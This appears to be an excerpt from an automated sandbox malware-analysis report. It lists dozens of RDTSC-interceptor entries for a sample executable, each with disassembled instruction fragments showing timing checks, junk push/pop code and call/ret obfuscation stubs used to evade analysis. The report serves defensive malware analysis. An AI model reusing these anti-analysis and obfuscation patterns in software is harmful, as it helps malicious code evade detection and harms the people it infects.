                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A7AC0 second address: 4A7AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A7AC4 second address: 4A7AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A7AC8 second address: 4A7AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4EF0C79886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A7AD9 second address: 4A7AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A7AE1 second address: 4A7AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A7D2D second address: 4A7D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A7D31 second address: 4A7D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F4EF0C79895h 0x0000000c pop edx 0x0000000d pushad 0x0000000e jo 00007F4EF0C79886h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jc 00007F4EF0C79886h 0x0000001c popad 0x0000001d push ebx 0x0000001e jmp 00007F4EF0C79890h 0x00000023 jmp 00007F4EF0C79893h 0x00000028 pop ebx 0x00000029 popad 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d jno 00007F4EF0C79886h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A7D8D second address: 4A7DA4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4EF0C09E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F4EF0C09E1Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A7DA4 second address: 4A7DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F4EF0C79893h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A7DC2 second address: 4A7DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E21h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A7DD7 second address: 4A7DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A7EFB second address: 4A7F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A7F01 second address: 4A7F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AA845 second address: 4AA84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AA9AA second address: 4AA9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AAB86 second address: 4AAB8C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AAB8C second address: 4AABA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C79890h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AAE80 second address: 4AAE86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AAE86 second address: 4AAE90 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4EF0C7988Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AB638 second address: 4AB63D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AB87A second address: 4AB897 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4EF0C79891h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AC927 second address: 4AC92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AC92D second address: 4AC9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007F4EF0C79895h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F4EF0C79888h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov esi, ebx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F4EF0C79888h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 mov edi, dword ptr [ebp+122D1D9Bh] 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f jo 00007F4EF0C7988Ch 0x00000055 jo 00007F4EF0C79886h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AC9A3 second address: 4AC9A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AC9A8 second address: 4AC9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F4EF0C79886h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AEC44 second address: 4AEC56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AEC56 second address: 4AEC5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AF9A5 second address: 4AF9C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C09E28h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B066A second address: 4B0674 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4EF0C79886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B3A32 second address: 4B3A55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4EF0C09E28h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B0E7F second address: 4B0E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B1954 second address: 4B1962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B1962 second address: 4B1974 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4EF0C79886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F4EF0C79886h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B4C86 second address: 4B4C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4EF0C09E16h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B4C91 second address: 4B4C96 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B78E0 second address: 4B78E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B5BDD second address: 4B5BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B78E4 second address: 4B797D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4EF0C09E1Fh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F4EF0C09E18h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+124770FAh] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007F4EF0C09E18h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c push 00000000h 0x0000004e sub dword ptr [ebp+122D2B26h], eax 0x00000054 xchg eax, esi 0x00000055 jmp 00007F4EF0C09E22h 0x0000005a push eax 0x0000005b push esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B5BE1 second address: 4B5BEB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4EF0C79886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B893A second address: 4B894A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 js 00007F4EF0C09E1Eh 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B7AB5 second address: 4B7AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B894A second address: 4B8990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 adc bl, FFFFFFBDh 0x00000009 push 00000000h 0x0000000b sbb bl, 00000000h 0x0000000e jnl 00007F4EF0C09E16h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F4EF0C09E18h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 push edi 0x00000031 pop ebx 0x00000032 push eax 0x00000033 pushad 0x00000034 jno 00007F4EF0C09E18h 0x0000003a push ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B7B52 second address: 4B7B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B7B56 second address: 4B7B65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4B8B44 second address: 4B8B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BA839 second address: 4BA840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BA840 second address: 4BA845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BA845 second address: 4BA84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BC747 second address: 4BC74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BC74B second address: 4BC751 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BC751 second address: 4BC778 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F4EF0C79894h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d je 00007F4EF0C79888h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BD69D second address: 4BD6A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BD746 second address: 4BD74A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BD74A second address: 4BD750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BD750 second address: 4BD756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BAA59 second address: 4BAA5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BC9C9 second address: 4BC9CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BFE2E second address: 4BFE34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BD87A second address: 4BD87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4BD87E second address: 4BD92F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4EF0C09E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F4EF0C09E1Eh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F4EF0C09E18h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c jmp 00007F4EF0C09E1Ah 0x00000031 push dword ptr fs:[00000000h] 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007F4EF0C09E18h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 and edi, 48BDCCD4h 0x00000058 mov dword ptr fs:[00000000h], esp 0x0000005f xor ebx, 5BBA1D90h 0x00000065 mov eax, dword ptr [ebp+122D14A9h] 0x0000006b mov bx, E713h 0x0000006f push FFFFFFFFh 0x00000071 nop 0x00000072 je 00007F4EF0C09E2Fh 0x00000078 jmp 00007F4EF0C09E29h 0x0000007d push eax 0x0000007e push eax 0x0000007f push edi 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C0FD6 second address: 4C0FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C0FDA second address: 4C0FFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jc 00007F4EF0C09E16h 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C0FFD second address: 4C1073 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F4EF0C79888h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov bx, 2F00h 0x00000026 mov dword ptr [ebp+122D2A53h], esi 0x0000002c push 00000000h 0x0000002e mov ebx, 4F7099E1h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F4EF0C79888h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f push eax 0x00000050 pushad 0x00000051 push esi 0x00000052 jmp 00007F4EF0C79896h 0x00000057 pop esi 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b pop eax 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C11AD second address: 4C1270 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007F4EF0C09E2Eh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F4EF0C09E18h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov ebx, dword ptr [ebp+122D2E35h] 0x00000031 push dword ptr fs:[00000000h] 0x00000038 mov bx, E6BCh 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov eax, dword ptr [ebp+122D0261h] 0x00000049 jmp 00007F4EF0C09E23h 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push eax 0x00000053 call 00007F4EF0C09E18h 0x00000058 pop eax 0x00000059 mov dword ptr [esp+04h], eax 0x0000005d add dword ptr [esp+04h], 00000018h 0x00000065 inc eax 0x00000066 push eax 0x00000067 ret 0x00000068 pop eax 0x00000069 ret 0x0000006a mov dword ptr [ebp+12477525h], ecx 0x00000070 jmp 00007F4EF0C09E1Ch 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C1270 second address: 4C1277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C45FA second address: 4C4600 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C4600 second address: 4C466B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4EF0C79888h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F4EF0C79888h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 xor di, 16D3h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F4EF0C79888h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 pushad 0x00000049 mov edx, dword ptr [ebp+122D2D17h] 0x0000004f and al, FFFFFFE3h 0x00000052 popad 0x00000053 push 00000000h 0x00000055 mov di, ax 0x00000058 movzx ebx, cx 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e push ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C38AF second address: 4C38B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C466B second address: 4C4670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C4670 second address: 4C4677 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4C4804 second address: 4C4809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 46D92D second address: 46D93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4EF0C09E16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4CE0C1 second address: 4CE0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C79898h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4CDC8B second address: 4CDC9F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4EF0C09E1Ah 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4CDC9F second address: 4CDCA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4CDCA3 second address: 4CDCAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4CDCAD second address: 4CDCB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
